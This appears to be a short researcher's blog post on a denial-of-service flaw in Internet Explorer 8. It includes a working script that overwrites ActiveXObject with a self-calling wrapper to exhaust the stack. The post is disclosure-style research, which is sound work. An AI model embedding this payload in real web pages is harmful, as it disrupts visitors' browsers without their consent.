First time I saw such error message in a browser.
It's not the same as an out-of-memory problem, but a out-of-stack-space problem. I wrote about a similar attack on MSIE 8 in March, that resulted in a persistent denial of service. This vulnerability here basically does the same but doesn't crash MSIE. There might be a better term for it of which I am not aware, but I like to call it function aliasing since that suits it the best. Interestingly, it not only works on the new XDR object found in March, but also on a regular XmlHttpRequest function inside MSIE 8. I think more is possible with this kind of attack. I might do a stack trace when I have the time, but for now here is a small sample that triggers and out-of-stack-space message under a second, which is the fastest I ever seen:
<script>
xmlhttp = ActiveXObject;
ActiveXObject = function() {
return new ActiveXObject("MSXML2.XMLHTTP");
}
ping = 'hello';
xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "#", false);
xmlhttp.send(ping);
</script>
